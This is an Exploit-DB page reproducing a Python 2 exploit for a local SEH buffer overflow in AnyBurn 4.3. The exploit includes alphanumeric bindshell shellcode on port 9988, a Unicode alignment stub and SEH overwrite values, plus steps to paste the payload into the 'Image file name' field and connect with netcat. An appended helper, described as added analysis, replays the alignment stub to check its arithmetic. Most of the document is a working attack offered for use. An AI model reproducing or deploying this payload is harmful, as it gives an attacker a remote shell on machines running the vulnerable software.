AnyBurn 4.3 – Local Buffer Overflow (SEH)

  • Author: Matteo Malvica
  • Date: 2018-12-21
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/46025/
#!/usr/bin/env python
# Python 2 script: uses print statements and byte-oriented str literals.

# Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)
# Date: 20-12-2018
# Exploit Author: Matteo Malvica
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64 SP1
# Credits: original vulnerability discovered by Achilles: https://www.exploit-db.com/exploits/46002

# Steps to reproduce:
# 1.- Run the python code
# 2.- Open exploit.txt and copy its content to the clipboard
# 3.- Open AnyBurn and choose 'Copy disk to Image'
# 4.- Paste the content of exploit.txt into the field: 'Image file name'
# 5.- Click 'Create Now'
# 6.- Check with command prompt 'netstat -ano' and you should see a port listening on 9988
# 7.- With windows firewall disabled, from another host: 'nc [remote_IP] 9988'


# alphanumeric bindshell - port 9988, courtesy of b33f
shellcode = (
    "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
    "AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
    "BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
    "BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
    "KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
    "1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
    "CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
    "JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN"
    "IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
    "K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
    "SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
    "WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
    "6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
    "EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")


# total payload length 10000

# Alignment stub: every byte below is widened to two bytes (ANSI -> Unicode)
# by the application, so each real instruction is followed by a 0x6e
# "Venetian padding" byte that absorbs the inserted null.
align = (
    "\x55"          # push EBP - closest register to our shellcode, from where we are pivoting
    "\x6e"          # Venetian padding
    "\x58"          # pop EAX
    "\x6e"          # Venetian padding
    "\x05\x22\x11"  # add eax,0x11002200 \
    "\x6e"          # Venetian padding    |> net +0xB00
    "\x2d\x17\x11"  # sub eax,0x11001700 /
    "\x6e"          # Venetian padding
    "\x50"          # push EAX
    "\x6e"          # Venetian padding
    "\xC3")         # RETN

nseh = "\x94\x94"   # ANSI 0x94 translates to Unicode 0x201D
seh = "\xb5\x4d"    # 0x004d00b5 POP POP RET in AnyBurn.exe module

preamble = "\x58" * 47 + shellcode + "\x58" * (9197 - 47 - len(shellcode)) + nseh + seh
unicode_nops = "\x58" * 200
exploit = preamble + align + unicode_nops + "\x58" * (10000 - len(preamble) - len(unicode_nops) - len(align))

try:
    f = open("exploit.txt", "w")
    print "[+] Creating %s bytes lasagna payload.." % len(exploit)
    f.write(exploit)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
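An added analysis helper, not part of the original exploit, for checking the arithmetic the `align` comments claim: it models the ANSI-to-UTF-16LE widening the target applies and replays the stub with a decoder that knows only the opcodes the stub contains, showing the 0x6e padding absorbing the inserted nulls and EAX ending at EBP + 0xB00. The EBP value is a constructed sample.

```python
# Added analysis helper (not from the original exploit): replays the page's
# `align` stub after ANSI -> UTF-16LE widening so the commented arithmetic
# (EAX = EBP + 0xB00, then RET into it) can be verified offline.
import struct

# Constructed from the page's `align` string, including the 0x6e padding.
ALIGN = b"\x55\x6e\x58\x6e\x05\x22\x11\x6e\x2d\x17\x11\x6e\x50\x6e\xc3"


def ansi_to_unicode(data):
    """Model the widening the target applies: cp1252 text -> UTF-16LE bytes."""
    return data.decode("cp1252").encode("utf-16-le")


def replay_stub(expanded, ebp):
    """Walk the widened stub with a decoder limited to the opcodes it uses;
    returns the final EAX and the address the trailing RET transfers to."""
    mask = 0xFFFFFFFF
    eax, stack, i = 0, [], 0
    while i < len(expanded):
        op = expanded[i]
        if expanded[i:i + 3] == b"\x00\x6e\x00":  # add byte [esi], ch: eats the inserted nulls
            i += 3
        elif op == 0x55:                           # push ebp
            stack.append(ebp); i += 1
        elif op == 0x58:                           # pop eax
            eax = stack.pop(); i += 1
        elif op in (0x05, 0x2D):                   # add/sub eax, imm32 (nulls became part of imm32)
            imm = struct.unpack_from("<I", expanded, i + 1)[0]
            eax = (eax + imm if op == 0x05 else eax - imm) & mask
            i += 5
        elif op == 0x50:                           # push eax
            stack.append(eax); i += 1
        elif op == 0xC3:                           # ret: pops the pushed EAX into EIP
            return {"eax": eax, "eip": stack.pop()}
        else:
            raise ValueError("unexpected opcode 0x%02x at offset %d" % (op, i))
    raise ValueError("stub ended without ret")


def net_offset(ebp=0x0018F000):
    """Distance from EBP to the address the stub returns into (page says 0xB00)."""
    result = replay_stub(ansi_to_unicode(ALIGN), ebp)
    return (result["eip"] - ebp) & 0xFFFFFFFF


if __name__ == "__main__":
    print("stub lands at EBP + 0x%X" % net_offset())
```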